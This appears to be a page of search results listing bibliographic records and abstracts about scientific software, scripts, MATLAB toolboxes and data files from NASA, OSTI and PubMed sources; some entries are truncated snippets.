B.V. All rights reserved.
Developing defensive aids suite technology on a virtual battlefield
NASA Astrophysics Data System (ADS)
Rapanotti, John L.; DeMontigny-Leboeuf, Annie; Palmarini, Marc; Cantin, Andre
2002-07-01
Modern anti-tank missiles and the requirement of rapid deployment are limiting the use of passive armour in protecting land vehicles. Vehicle survivability is becoming more dependent on sensors, computers and countermeasures to detect and avoid threats. The integration of various technologies into a Defensive Aids Suite (DAS) can be designed and analyzed by combining field trials and laboratory data with modeling and simulation. MATLAB is used as a quick prototyping tool to model DAS systems and facilitate transfer to other researchers. The DAS model can be transferred from MATLAB or programmed directly in ModSAF (Modular Semi-Automated Forces), which is used to construct the virtual battlefield. Through scripted input files, a fixed battle approach ensures implementation and analysis meeting the requirements of three different interests. These three communities include the scientists and engineers, military and operations research. This approach ensures the modelling of processes known to be important regardless of the level of information available about the system. A system can be modelled phenomenologically until more information is available. Further processing of the simulation can be used to optimize the vehicle for a specific mission. ModSAF will be used to analyze and plan trials and develop DAS technology for future vehicles. Survivability of a DAS-equipped vehicle can be assessed relative to a basic vehicle without a DAS. In later stages, more complete DAS systems will be analyzed to determine the optimum configuration of the DAS components and the effectiveness of a DAS-equipped vehicle for specific missions. These concepts and approach will be discussed in the paper.
DOE Office of Scientific and Technical Information (OSTI.GOV)
Marsh, Amber; Harsch, Tim; Pitt, Julie
2007-08-31
The computer side of the IMAGE project consists of a collection of Perl scripts that perform a variety of tasks; scripts are available to insert, update and delete data from the underlying Oracle database, download data from NCBI's Genbank and other sources, and generate data files for download by interested parties. Web scripts make up the tracking interface, and various tools available on the project web-site (image.llnl.gov) that provide a search interface to the database.
Software for Managing Parametric Studies
NASA Technical Reports Server (NTRS)
Yarrow, Maurice; McCann, Karen M.; DeVivo, Adrian
2003-01-01
The Information Power Grid Virtual Laboratory (ILab) is a Practical Extraction and Reporting Language (PERL) graphical-user-interface computer program that generates shell scripts to facilitate parametric studies performed on the Grid. (The Grid denotes a worldwide network of supercomputers used for scientific and engineering computations involving data sets too large to fit on desktop computers.) Heretofore, parametric studies on the Grid have been impeded by the need to create control language scripts and edit input data files painstaking tasks that are necessary for managing multiple jobs on multiple computers. ILab reflects an object-oriented approach to automation of these tasks: All data and operations are organized into packages in order to accelerate development and debugging. A container or document object in ILab, called an experiment, contains all the information (data and file paths) necessary to define a complex series of repeated, sequenced, and/or branching processes. For convenience and to enable reuse, this object is serialized to and from disk storage. At run time, the current ILab experiment is used to generate required input files and shell scripts, create directories, copy data files, and then both initiate and monitor the execution of all computational processes.
CellSegm - a MATLAB toolbox for high-throughput 3D cell segmentation
2013-01-01
The application of fluorescence microscopy in cell biology often generates a huge amount of imaging data. Automated whole cell segmentation of such data enables the detection and analysis of individual cells, where a manual delineation is often time consuming, or practically not feasible. Furthermore, compared to manual analysis, automation normally has a higher degree of reproducibility. CellSegm, the software presented in this work, is a Matlab based command line software toolbox providing an automated whole cell segmentation of images showing surface stained cells, acquired by fluorescence microscopy. It has options for both fully automated and semi-automated cell segmentation. Major algorithmic steps are: (i) smoothing, (ii) Hessian-based ridge enhancement, (iii) marker-controlled watershed segmentation, and (iv) feature-based classfication of cell candidates. Using a wide selection of image recordings and code snippets, we demonstrate that CellSegm has the ability to detect various types of surface stained cells in 3D. After detection and outlining of individual cells, the cell candidates can be subject to software based analysis, specified and programmed by the end-user, or they can be analyzed by other software tools. A segmentation of tissue samples with appropriate characteristics is also shown to be resolvable in CellSegm. The command-line interface of CellSegm facilitates scripting of the separate tools, all implemented in Matlab, offering a high degree of flexibility and tailored workflows for the end-user. The modularity and scripting capabilities of CellSegm enable automated workflows and quantitative analysis of microscopic data, suited for high-throughput image based screening. PMID:23938087
CellSegm - a MATLAB toolbox for high-throughput 3D cell segmentation.
Hodneland, Erlend; Kögel, Tanja; Frei, Dominik Michael; Gerdes, Hans-Hermann; Lundervold, Arvid
2013-08-09
: The application of fluorescence microscopy in cell biology often generates a huge amount of imaging data. Automated whole cell segmentation of such data enables the detection and analysis of individual cells, where a manual delineation is often time consuming, or practically not feasible. Furthermore, compared to manual analysis, automation normally has a higher degree of reproducibility. CellSegm, the software presented in this work, is a Matlab based command line software toolbox providing an automated whole cell segmentation of images showing surface stained cells, acquired by fluorescence microscopy. It has options for both fully automated and semi-automated cell segmentation. Major algorithmic steps are: (i) smoothing, (ii) Hessian-based ridge enhancement, (iii) marker-controlled watershed segmentation, and (iv) feature-based classfication of cell candidates. Using a wide selection of image recordings and code snippets, we demonstrate that CellSegm has the ability to detect various types of surface stained cells in 3D. After detection and outlining of individual cells, the cell candidates can be subject to software based analysis, specified and programmed by the end-user, or they can be analyzed by other software tools. A segmentation of tissue samples with appropriate characteristics is also shown to be resolvable in CellSegm. The command-line interface of CellSegm facilitates scripting of the separate tools, all implemented in Matlab, offering a high degree of flexibility and tailored workflows for the end-user. The modularity and scripting capabilities of CellSegm enable automated workflows and quantitative analysis of microscopic data, suited for high-throughput image based screening.
Vali, Faisal S; Hsi, Alex; Cho, Paul; Parsai, Homayon; Garver, Elizabeth; Garza, Richard
2008-11-06
The Calypso 4D Localization System records prostate motion continuously during radiation treatment. It stores the data across thousands of Excel files. We developed Javascript (JScript) libraries for Windows Script Host (WSH) that use ActiveX Data Objects, OLE Automation and SQL to statistically analyze the data and display the results as a comprehensible Excel table. We then leveraged these libraries in other research to perform vector math on data spread across multiple access databases.
Data files from the Grays Harbor Sediment Transport Experiment Spring 2001
Landerman, Laura A.; Sherwood, Christopher R.; Gelfenbaum, Guy; Lacy, Jessica; Ruggiero, Peter; Wilson, Douglas; Chisholm, Tom; Kurrus, Keith
2005-01-01
This publication consists of two DVD-ROMs, both of which are presented here. This report describes data collected during the Spring 2001 Grays Harbor Sediment Transport Experiment, and provides additional information needed to interpret the data. Two DVDs accompany this report; both contain documentation in html format that assist the user in navigating through the data. DVD-ROM-1 contains a digital version of this report in .pdf format, raw Aquatec acoustic backscatter (ABS) data in .zip format, Sonar data files in .avi format, and coastal processes and morphology data in ASCII format. ASCII data files are provided in .zip format; bundled coastal processes ASCII files are separated by deployment and instrument; bundled morphology ASCII files are separated into monthly data collection efforts containing the beach profiles collected (or extracted from the surface map) at that time; weekly surface maps are also bundled together. DVD-ROM-2 contains a digital version of this report in .pdf format, the binary data files collected by the SonTek instrumentation, calibration files for the pressure sensors, and Matlab m-files for loading the ABS data into Matlab and cleaning-up the optical backscatter (OBS) burst time-series data.
2014-09-05
shell script that checks Java code and prints out an alphabetical list of unrec- ognized spellings. It properly handles namesWithEmbeddedCapitalization...local/bin/ispell. To run this script, type $PTII/util/testsuite/ptspell *.java • testsuite/chkjava is a shell script for checking various other...best if the svn:native property is set. Below is how to check the values for a file named README.txt: bash-3.2$ svn proplist README.txt Properties on
Dibblee, T. W.; Digital database compiled by Graham, S. E.; Mahony, T.M.; Blissenbach, J.L.; Mariant, J.J.; Wentworth, C.M.
1999-01-01
This Open-File Report is a digital geologic map database. The report serves to introduce and describe the digital data. There is no paper map included in the Open-File Report. The report includes PostScript and PDF plot files that can be used to plot images of the geologic map sheet and explanation sheet. This digital map database is prepared from a previously published map by Dibblee (1973). The geologic map database delineates map units that are identified by general age, lithology, and clast size following the stratigraphic nomenclature of the U.S. Geological Survey. For descriptions of the units, their stratigraphic relations, and sources of geologic mapping, consult the explanation sheet (of99-14_4b.ps or of99-14_4d.pdf), or the original published paper map (Dibblee, 1973). The scale of the source map limits the spatial resolution (scale) of the database to 1:125,000 or smaller. For those interested in the geology of Carrizo Plain and vicinity who do not use an ARC/INFO compatible Geographic Information System (GIS), but would like to obtain a paper map and explanation, PDF and PostScript plot files containing map images of the data in the digital database, as well as PostScript and PDF plot files of the explanation sheet and explanatory text, have been included in the database package (please see the section 'Digital Plot Files', page 5). The PostScript plot files require a gzip utility to access them. For those without computer capability, we can provide users with the PostScript or PDF files on tape that can be taken to a vendor for plotting. Paper plots can also be ordered directly from the USGS (please see the section 'Obtaining Plots from USGS Open-File Services', page 5). The content and character of the database, methods of obtaining it, and processes of extracting the map database from the tar (tape archive) file are described herein. The map database itself, consisting of six ARC/INFO coverages, can be obtained over the Internet or by magnetic tape copy as described below. The database was compiled using ARC/INFO, a commercial Geographic Information System (Environmental Systems Research Institute, Redlands, California), with version 3.0 of the menu interface ALACARTE (Fitzgibbon and Wentworth, 1991, Fitzgibbon, 1991, Wentworth and Fitzgibbon, 1991). The ARC/INFO coverages are stored in uncompressed ARC export format (ARC/INFO version 7.x). All data files have been compressed, and may be uncompressed with gzip, which is available free of charge over the Internet via links from the USGS Public Domain Software page (http://edcwww.cr.usgs.gov/doc/edchome/ndcdb/public.html). ARC/INFO export files (files with the .e00 extension) can be converted into ARC/INFO coverages in ARC/INFO (see below) and can be read by some other Geographic Information Systems, such as MapInfo via ArcLink and ESRI's ArcView.
Automated Quantification of Gradient Defined Features
2008-09-01
defined features in submarine environments. The technique utilizes MATLAB scripts to convert bathymetry data into a gradient dataset, produce gradient...maps, and most importantly, automate the process of defining and characterizing gradient defined features such as flows, faults, landslide scarps, folds...convergent plate margin hosts a series of large serpentinite mud volcanoes (Fig. 1). One of the largest of these active mud volcanoes is Big Blue
Zhou, Yangzhong; Cattley, Richard T; Cario, Clinton L; Bai, Qing; Burton, Edward A
2014-07-01
This article describes a method to quantify the movements of larval zebrafish in multiwell plates, using the open-source MATLAB applications LSRtrack and LSRanalyze. The protocol comprises four stages: generation of high-quality, flatly illuminated video recordings with exposure settings that facilitate object recognition; analysis of the resulting recordings using tools provided in LSRtrack to optimize tracking accuracy and motion detection; analysis of tracking data using LSRanalyze or custom MATLAB scripts; and implementation of validation controls. The method is reliable, automated and flexible, requires <1 h of hands-on work for completion once optimized and shows excellent signal:noise characteristics. The resulting data can be analyzed to determine the following: positional preference; displacement, velocity and acceleration; and duration and frequency of movement events and rest periods. This approach is widely applicable to the analysis of spontaneous or stimulus-evoked zebrafish larval neurobehavioral phenotypes resulting from a broad array of genetic and environmental manipulations, in a multiwell plate format suitable for high-throughput applications.
Wind Tunnel Simulations of the Mock Urban Setting Test - Experimental Procedures and Data Analysis
2004-07-01
depends on the subjective choice of points to include in the constant stress region. This is demonstrated by the marked difference in the slope for the two...designed explicitly for the analysis of time series and signal processing , particularly for atmospheric dispersion ex- periments. The scripts developed...below. Processing scripts are available for all these analyses in the /scripts directory. All files of figures and processed data resulting from these
Zimmermann, Patric; Green, Robert J; Haverkort, Maurits W; de Groot, Frank M F
2018-05-01
Some initial instructions for the Quanty4RIXS program written in MATLAB ® are provided. The program assists in the calculation of 1s 2p RIXS and 1s 2p RIXS-MCD spectra using Quanty. Furthermore, 1s XAS and 2p 3d RIXS calculations in different symmetries can also be performed. It includes the Hartree-Fock values for the Slater integrals and spin-orbit interactions for several 3d transition metal ions that are required to create the .lua scripts containing all necessary parameters and quantum mechanical definitions for the calculations. The program can be used free of charge and is designed to allow for further adjustments of the scripts. open access.
A suite of MATLAB-based computational tools for automated analysis of COPAS Biosort data
Morton, Elizabeth; Lamitina, Todd
2010-01-01
Complex Object Parametric Analyzer and Sorter (COPAS) devices are large-object, fluorescence-capable flow cytometers used for high-throughput analysis of live model organisms, including Drosophila melanogaster, Caenorhabditis elegans, and zebrafish. The COPAS is especially useful in C. elegans high-throughput genome-wide RNA interference (RNAi) screens that utilize fluorescent reporters. However, analysis of data from such screens is relatively labor-intensive and time-consuming. Currently, there are no computational tools available to facilitate high-throughput analysis of COPAS data. We used MATLAB to develop algorithms (COPAquant, COPAmulti, and COPAcompare) to analyze different types of COPAS data. COPAquant reads single-sample files, filters and extracts values and value ratios for each file, and then returns a summary of the data. COPAmulti reads 96-well autosampling files generated with the ReFLX adapter, performs sample filtering, graphs features across both wells and plates, performs some common statistical measures for hit identification, and outputs results in graphical formats. COPAcompare performs a correlation analysis between replicate 96-well plates. For many parameters, thresholds may be defined through a simple graphical user interface (GUI), allowing our algorithms to meet a variety of screening applications. In a screen for regulators of stress-inducible GFP expression, COPAquant dramatically accelerated data analysis and allowed us to rapidly move from raw data to hit identification. Because the COPAS file structure is standardized and our MATLAB code is freely available, our algorithms should be extremely useful for analysis of COPAS data from multiple platforms and organisms. The MATLAB code is freely available at our web site (www.med.upenn.edu/lamitinalab/downloads.shtml). PMID:20569218
SWIFT MODELLER: a Java based GUI for molecular modeling.
Mathur, Abhinav; Shankaracharya; Vidyarthi, Ambarish S
2011-10-01
MODELLER is command line argument based software which requires tedious formatting of inputs and writing of Python scripts which most people are not comfortable with. Also the visualization of output becomes cumbersome due to verbose files. This makes the whole software protocol very complex and requires extensive study of MODELLER manuals and tutorials. Here we describe SWIFT MODELLER, a GUI that automates formatting, scripting and data extraction processes and present it in an interactive way making MODELLER much easier to use than before. The screens in SWIFT MODELLER are designed keeping homology modeling in mind and their flow is a depiction of its steps. It eliminates the formatting of inputs, scripting processes and analysis of verbose output files through automation and makes pasting of the target sequence as the only prerequisite. Jmol (3D structure visualization tool) has been integrated into the GUI which opens and demonstrates the protein data bank files created by the MODELLER software. All files required and created by the software are saved in a folder named after the work instance's date and time of execution. SWIFT MODELLER lowers the skill level required for the software through automation of many of the steps in the original software protocol, thus saving an enormous amount of time per instance and making MODELLER very easy to work with.
SCDU Testbed Automated In-Situ Alignment, Data Acquisition and Analysis
NASA Technical Reports Server (NTRS)
Werne, Thomas A.; Wehmeier, Udo J.; Wu, Janet P.; An, Xin; Goullioud, Renaud; Nemati, Bijan; Shao, Michael; Shen, Tsae-Pyng J.; Wang, Xu; Weilert, Mark A.;
2010-01-01
In the course of fulfilling its mandate, the Spectral Calibration Development Unit (SCDU) testbed for SIM-Lite produces copious amounts of raw data. To effectively spend time attempting to understand the science driving the data, the team devised computerized automations to limit the time spent bringing the testbed to a healthy state and commanding it, and instead focus on analyzing the processed results. We developed a multi-layered scripting language that emphasized the scientific experiments we conducted, which drastically shortened our experiment scripts, improved their readability, and all-but-eliminated testbed operator errors. In addition to scientific experiment functions, we also developed a set of automated alignments that bring the testbed up to a well-aligned state with little more than the push of a button. These scripts were written in the scripting language, and in Matlab via an interface library, allowing all members of the team to augment the existing scripting language with complex analysis scripts. To keep track of these results, we created an easily-parseable state log in which we logged both the state of the testbed and relevant metadata. Finally, we designed a distributed processing system that allowed us to farm lengthy analyses to a collection of client computers which reported their results in a central log. Since these logs were parseable, we wrote query scripts that gave us an effortless way to compare results collected under different conditions. This paper serves as a case-study, detailing the motivating requirements for the decisions we made and explaining the implementation process.
Reportable STDs in Young People 15-24 Years of Age, by State
... STD 101 in a Box Home Script for Sex in the City Video STD Clinical Slides STD Clinical Slides STD Picture ... include: line graphs by year; pie charts for sex; bar charts by state and country; bar charts for age, race/ethnicity, and transmission ... Quicktime file RealPlayer file Text file ...
AlleleCoder: a PERL script for coding codominant polymorphism data for PCA analysis
USDA-ARS?s Scientific Manuscript database
A useful biological interpretation of diploid heterozygotes is in terms of the dose of the common allele (0, 1 or 2 copies). We have developed a PERL script that converts FASTA files into coded spreadsheets suitable for Principal Component Analysis (PCA). In combination with R and R Commander, two- ...
ORPC RivGen controller performance raw data - Igiugig 2015
McEntee, Jarlath
2015-12-18
Contains raw data for operations of Ocean Renewable Power Company (ORPC) RivGen Power System in Igiugig 2015 in Matlab data file format. Two data files capture the data and timestamps for data, including power in, voltage, rotation rate, and velocity.
The Waveform Suite: A robust platform for accessing and manipulating seismic waveforms in MATLAB
NASA Astrophysics Data System (ADS)
Reyes, C. G.; West, M. E.; McNutt, S. R.
2009-12-01
The Waveform Suite, developed at the University of Alaska Geophysical Institute, is an open-source collection of MATLAB classes that provide a means to import, manipulate, display, and share waveform data while ensuring integrity of the data and stability for programs that incorporate them. Data may be imported from a variety of sources, such as Antelope, Winston databases, SAC files, SEISAN, .mat files, or other user-defined file formats. The waveforms being manipulated in MATLAB are isolated from their stored representations, relieving the overlying programs from the responsibility of understanding the specific format in which data is stored or retrieved. The waveform class provides an object oriented framework that simplifies manipulations to waveform data. Playing with data becomes easier because the tedious aspects of data manipulation have been automated. The user is able to change multiple waveforms simultaneously using standard mathematical operators and other syntactically familiar functions. Unlike MATLAB structs or workspace variables, the data stored within waveform class objects are protected from modification, and instead are accessed through standardized functions, such as get and set; these are already familiar to users of MATLAB’s graphical features. This prevents accidental or nonsensical modifications to the data, which in turn simplifies troubleshooting of complex programs. Upgrades to the internal structure of the waveform class are invisible to applications which use it, making maintenance easier. We demonstrate the Waveform Suite’s capabilities on seismic data from Okmok and Redoubt volcanoes. Years of data from Okmok were retrieved from Antelope and Winston databases. Using the Waveform Suite, we built a tremor-location program. Because the program was built on the Waveform Suite, modifying it to operate on real-time data from Redoubt involved only minimal code changes. The utility of the Waveform Suite as a foundation for large developments is demonstrated with the Correlation Toolbox for MATLAB. This mature package contains 50+ codes for carrying out various type of waveform correlation analyses (multiplet analysis, clustering, interferometry, …) This package is greatly strengthened by delegating numerous book-keeping and signal processing tasks to the underlying Waveform Suite. The Waveform Suite’s built-in tools for searching arbitrary directory/file structures is demonstrated with matched video and audio from the recent eruption of Redoubt Volcano. These tools were used to find subsets of photo images corresponding to specific seismic traces. Using Waveform’s audio file routines, matched video and audio were assembled to produce outreach-quality eruption products. The Waveform Suite is not designed as a ready-to-go replacement for more comprehensive packages such as SAC or AH. Rather, it is a suite of classes which provide core time series functionality in a MATLAB environment. It is designed to be a more robust alternative to the numerous ad hoc MATLAB formats that exist. Complex programs may be created upon the Waveform Suite’s framework, while existing programs may be modified to take advantage of the Waveform Suites capabilities.
DOE Office of Scientific and Technical Information (OSTI.GOV)
2012-09-11
While an organized source of reference information on PV performance modeling is certainly valuable, there is nothing to match the availability of actual examples of modeling algorithms being used in practice. To meet this need, Sandia has developed a PV performance modeling toolbox (PV_LIB) for Matlab. It contains a set of well-documented, open source functions and example scripts showing the functions being used in practical examples. This toolbox is meant to help make the multi-step process of modeling a PV system more transparent and provide the means for model users to validate and understand the models they use and ormore » develop. It is fully integrated into Matlab's help and documentation utilities. The PV_LIB Toolbox provides more than 30 functions that are sorted into four categories« less
Host-Nation Operations: Soldier Training on Governance (HOST-G) Training Support Package
2011-07-01
restricted this webpage from running scripts or ActiveX controls that could access your computer. Click here for options…” • If this occurs, select that...scripts and ActiveX controls can be useful, but active content might also harm your computer. Are you sure you want to let this file run active
VizieR Online Data Catalog: RefleX : X-ray-tracing code (Paltani+, 2017)
NASA Astrophysics Data System (ADS)
Paltani, S.; Ricci, C.
2017-11-01
We provide here the RefleX executable, for both Linux and MacOSX, together with the User Manual and example script file and output file Running (for instance): reflex_linux will produce the file reflex.out Note that the results may differ slightly depending on the OS, because of slight differences in some implementations numerical computations. The difference are scientifically meaningless. (5 data files).
Summary of Documentation for DYNA3D-ParaDyn's Software Quality Assurance Regression Test Problems
DOE Office of Scientific and Technical Information (OSTI.GOV)
Zywicz, Edward
The Software Quality Assurance (SQA) regression test suite for DYNA3D (Zywicz and Lin, 2015) and ParaDyn (DeGroot, et al., 2015) currently contains approximately 600 problems divided into 21 suites, and is a required component of ParaDyn’s SQA plan (Ferencz and Oliver, 2013). The regression suite allows developers to ensure that software modifications do not unintentionally alter the code response. The entire regression suite is run prior to permanently incorporating any software modification or addition. When code modifications alter test problem results, the specific cause must be determined and fully understood before the software changes and revised test answers can bemore » incorporated. The regression suite is executed on LLNL platforms using a Python script and an associated data file. The user specifies the DYNA3D or ParaDyn executable, number of processors to use, test problems to run, and other options to the script. The data file details how each problem and its answer extraction scripts are executed. For each problem in the regression suite there exists an input deck, an eight-processor partition file, an answer file, and various extraction scripts. These scripts assemble a temporary answer file in a specific format from the simulation results. The temporary and stored answer files are compared to a specific level of numerical precision, and when differences are detected the test problem is flagged as failed. Presently, numerical results are stored and compared to 16 digits. At this accuracy level different processor types, compilers, number of partitions, etc. impact the results to various degrees. Thus, for consistency purposes the regression suite is run with ParaDyn using 8 processors on machines with a specific processor type (currently the Intel Xeon E5530 processor). For non-parallel regression problems, i.e., the two XFEM problems, DYNA3D is used instead. When environments or platforms change, executables using the current source code and the new resource are created and the regression suite is run. If differences in answers arise, the new answers are retained provided that the differences are inconsequential. This bootstrap approach allows the test suite answers to evolve in a controlled manner with a high level of confidence. Developers also run the entire regression suite with (serial) DYNA3D. While these results normally differ from the stored (parallel) answers, abnormal termination or wildly different values are strong indicators of potential issues.« less
... this page, please enable JavaScript. MedlinePlus produces XML data sets that you are welcome to download and use. If you have questions about the MedlinePlus XML files, please contact us . For additional sources of MedlinePlus data in XML format, visit our Web service page, ...
Grinter, Sam Z; Yan, Chengfei; Huang, Sheng-You; Jiang, Lin; Zou, Xiaoqin
2013-08-26
In this study, we use the recently released 2012 Community Structure-Activity Resource (CSAR) data set to evaluate two knowledge-based scoring functions, ITScore and STScore, and a simple force-field-based potential (VDWScore). The CSAR data set contains 757 compounds, most with known affinities, and 57 crystal structures. With the help of the script files for docking preparation, we use the full CSAR data set to evaluate the performances of the scoring functions on binding affinity prediction and active/inactive compound discrimination. The CSAR subset that includes crystal structures is used as well, to evaluate the performances of the scoring functions on binding mode and affinity predictions. Within this structure subset, we investigate the importance of accurate ligand and protein conformational sampling and find that the binding affinity predictions are less sensitive to non-native ligand and protein conformations than the binding mode predictions. We also find the full CSAR data set to be more challenging in making binding mode predictions than the subset with structures. The script files used for preparing the CSAR data set for docking, including scripts for canonicalization of the ligand atoms, are offered freely to the academic community.
Activate/Inhibit KGCS Gateway via Master Console EIC Pad-B Display
NASA Technical Reports Server (NTRS)
Ferreira, Pedro Henrique
2014-01-01
My internship consisted of two major projects for the Launch Control System.The purpose of the first project was to implement the Application Control Language (ACL) to Activate Data Acquisition (ADA) and to Inhibit Data Acquisition (IDA) the Kennedy Ground Control Sub-Systems (KGCS) Gateway, to update existing Pad-B End Item Control (EIC) Display to program the ADA and IDA buttons with new ACL, and to test and release the ACL Display.The second project consisted of unit testing all of the Application Services Framework (ASF) by March 21st. The XmlFileReader was unit tested and reached 100 coverage. The XmlFileReader class is used to grab information from XML files and use them to initialize elements in the other framework elements by using the Xerces C++ XML Parser; which is open source commercial off the shelf software. The ScriptThread was also tested. ScriptThread manages the creation and activation of script threads. A large amount of the time was used in initializing the environment and learning how to set up unit tests and getting familiar with the specific segments of the project that were assigned to us.
CFS MATLAB toolbox: An experiment builder for continuous flash suppression (CFS) task.
Nuutinen, Mikko; Mustonen, Terhi; Häkkinen, Jukka
2017-09-15
CFS toolbox is an open-source collection of MATLAB functions that utilizes PsychToolbox-3 (PTB-3). It is designed to allow a researcher to create and run continuous flash suppression experiments using a variety of experimental parameters (i.e., stimulus types and locations, noise characteristics, and experiment window settings). In a CFS experiment, one of the eyes at a time is presented with a dynamically changing noise pattern, while the other eye is concurrently presented with a static target stimulus, such as a Gabor patch. Due to the strong interocular suppression created by the dominant noise pattern mask, the target stimulus is rendered invisible for an extended duration. Very little knowledge of MATLAB is required for using the toolbox; experiments are generated by modifying csv files with the required parameters, and result data are output to text files for further analysis. The open-source code is available on the project page under a Creative Commons License ( http://www.mikkonuutinen.arkku.net/CFS_toolbox/ and https://bitbucket.org/mikkonuutinen/cfs_toolbox ).
Simplifying Chandra aperture photometry with srcflux
NASA Astrophysics Data System (ADS)
Glotfelty, Kenny
2014-11-01
This poster will highlight some of the features of the srcflux script in CIAO. This script combines many threads and tools together to compute photometric properties for sources: counts, rates, various fluxes, and confidence intervals or upper limits. Beginning and casual X-ray astronomers greatly benefit from the simple interface: just specify the event file and a celestial location, while power-users and X-ray astronomy experts can take advantage of the all the parameters to automatically produce catalogs for entire fields. Current limitations and future enhancements of the script will also be presented.
Early Market Site Identification Data
Levi Kilcher
2016-04-01
This data was compiled for the 'Early Market Opportunity Hot Spot Identification' project. The data and scripts included were used in the 'MHK Energy Site Identification and Ranking Methodology' Reports (Part I: Wave, NREL Report #66038; Part II: Tidal, NREL Report #66079). The Python scripts will generate a set of results--based on the Excel data files--some of which were described in the reports. The scripts depend on the 'score_site' package, and the score site package depends on a number of standard Python libraries (see the score_site install instructions).
Charming Users into Scripting CIAO with Python
NASA Astrophysics Data System (ADS)
Burke, D. J.
2011-07-01
The Science Data Systems group of the Chandra X-ray Center provides a number of scripts and Python modules that extend the capabilities of CIAO. Experience in converting the existing scripts—written in a variety of languages such as bash, csh/tcsh, Perl and S-Lang—to Python, and conversations with users, led to the development of the ciao_contrib.runtool module. This allows users to easily run CIAO tools from Python scripts, and utilizes the metadata provided by the parameter-file system to create an API that provides the flexibility and safety guarantees of the command-line. The module is provided to the user community and is being used within our group to create new scripts.
VizieR Online Data Catalog: Planetary atmosphere radiative transport code (Garcia Munoz+ 2015)
NASA Astrophysics Data System (ADS)
Garcia Munoz, A.; Mills, F. P.
2014-08-01
Files are: * readme.txt * Input files: INPUThazeL.txt, INPUTL13.txt, INPUT_L60.txt; they contain explanations to the input parameters. Copy INPUT_XXXX.txt into INPUT.dat to execute some of the examples described in the reference. * Files with scattering matrix properties: phFhazeL.txt, phFL13.txt, phF_L60.txt * Script for compilation in GFortran (myscript) (10 data files).
Simplifying and enhancing the use of PyMOL with horizontal scripts
2016-01-01
Abstract Scripts are used in PyMOL to exert precise control over the appearance of the output and to ease remaking similar images at a later time. We developed horizontal scripts to ease script development. A horizontal script makes a complete scene in PyMOL like a traditional vertical script. The commands in a horizontal script are separated by semicolons. These scripts are edited interactively on the command line with no need for an external text editor. This simpler workflow accelerates script development. In using PyMOL, the illustration of a molecular scene requires an 18‐element matrix of view port settings. The default format spans several lines and is laborious to manually reformat for one line. This default format prevents the fast assembly of horizontal scripts that can reproduce a molecular scene. We solved this problem by writing a function that displays the settings on one line in a compact format suitable for horizontal scripts. We also demonstrate the mapping of aliases to horizontal scripts. Many aliases can be defined in a single script file, which can be useful for applying costume molecular representations to any structure. We also redefined horizontal scripts as Python functions to enable the use of the help function to print documentation about an alias to the command history window. We discuss how these methods of using horizontal scripts both simplify and enhance the use of PyMOL in research and education. PMID:27488983
2008-07-07
analyzing multivariate data sets. The system was developed using the Java Development Kit (JDK) version 1.5; and it yields interactive performance on a... script and captures output from the MATLAB’s “regress” and “stepwisefit” utilities that perform simple and stepwise regression, respectively. The MATLAB...Statistical Association, vol. 85, no. 411, pp. 664–675, 1990. [9] H. Hauser, F. Ledermann, and H. Doleisch, “ Angular brushing of extended parallel coordinates
Oostenveld, Robert; Fries, Pascal; Maris, Eric; Schoffelen, Jan-Mathijs
2011-01-01
This paper describes FieldTrip, an open source software package that we developed for the analysis of MEG, EEG, and other electrophysiological data. The software is implemented as a MATLAB toolbox and includes a complete set of consistent and user-friendly high-level functions that allow experimental neuroscientists to analyze experimental data. It includes algorithms for simple and advanced analysis, such as time-frequency analysis using multitapers, source reconstruction using dipoles, distributed sources and beamformers, connectivity analysis, and nonparametric statistical permutation tests at the channel and source level. The implementation as toolbox allows the user to perform elaborate and structured analyses of large data sets using the MATLAB command line and batch scripting. Furthermore, users and developers can easily extend the functionality and implement new algorithms. The modular design facilitates the reuse in other software packages.
Three-dimensional rendering of segmented object using matlab - biomed 2010.
Anderson, Jeffrey R; Barrett, Steven F
2010-01-01
The three-dimensional rendering of microscopic objects is a difficult and challenging task that often requires specialized image processing techniques. Previous work has been described of a semi-automatic segmentation process of fluorescently stained neurons collected as a sequence of slice images with a confocal laser scanning microscope. Once properly segmented, each individual object can be rendered and studied as a three-dimensional virtual object. This paper describes the work associated with the design and development of Matlab files to create three-dimensional images from the segmented object data previously mentioned. Part of the motivation for this work is to integrate both the segmentation and rendering processes into one software application, providing a seamless transition from the segmentation tasks to the rendering and visualization tasks. Previously these tasks were accomplished on two different computer systems, windows and Linux. This transition basically limits the usefulness of the segmentation and rendering applications to those who have both computer systems readily available. The focus of this work is to create custom Matlab image processing algorithms for object rendering and visualization, and merge these capabilities to the Matlab files that were developed especially for the image segmentation task. The completed Matlab application will contain both the segmentation and rendering processes in a single graphical user interface, or GUI. This process for rendering three-dimensional images in Matlab requires that a sequence of two-dimensional binary images, representing a cross-sectional slice of the object, be reassembled in a 3D space, and covered with a surface. Additional segmented objects can be rendered in the same 3D space. The surface properties of each object can be varied by the user to aid in the study and analysis of the objects. This inter-active process becomes a powerful visual tool to study and understand microscopic objects.
Pybel: a Python wrapper for the OpenBabel cheminformatics toolkit
O'Boyle, Noel M; Morley, Chris; Hutchison, Geoffrey R
2008-01-01
Background Scripting languages such as Python are ideally suited to common programming tasks in cheminformatics such as data analysis and parsing information from files. However, for reasons of efficiency, cheminformatics toolkits such as the OpenBabel toolkit are often implemented in compiled languages such as C++. We describe Pybel, a Python module that provides access to the OpenBabel toolkit. Results Pybel wraps the direct toolkit bindings to simplify common tasks such as reading and writing molecular files and calculating fingerprints. Extensive use is made of Python iterators to simplify loops such as that over all the molecules in a file. A Pybel Molecule can be easily interconverted to an OpenBabel OBMol to access those methods or attributes not wrapped by Pybel. Conclusion Pybel allows cheminformaticians to rapidly develop Python scripts that manipulate chemical information. It is open source, available cross-platform, and offers the power of the OpenBabel toolkit to Python programmers. PMID:18328109
Pybel: a Python wrapper for the OpenBabel cheminformatics toolkit.
O'Boyle, Noel M; Morley, Chris; Hutchison, Geoffrey R
2008-03-09
Scripting languages such as Python are ideally suited to common programming tasks in cheminformatics such as data analysis and parsing information from files. However, for reasons of efficiency, cheminformatics toolkits such as the OpenBabel toolkit are often implemented in compiled languages such as C++. We describe Pybel, a Python module that provides access to the OpenBabel toolkit. Pybel wraps the direct toolkit bindings to simplify common tasks such as reading and writing molecular files and calculating fingerprints. Extensive use is made of Python iterators to simplify loops such as that over all the molecules in a file. A Pybel Molecule can be easily interconverted to an OpenBabel OBMol to access those methods or attributes not wrapped by Pybel. Pybel allows cheminformaticians to rapidly develop Python scripts that manipulate chemical information. It is open source, available cross-platform, and offers the power of the OpenBabel toolkit to Python programmers.
NASA Technical Reports Server (NTRS)
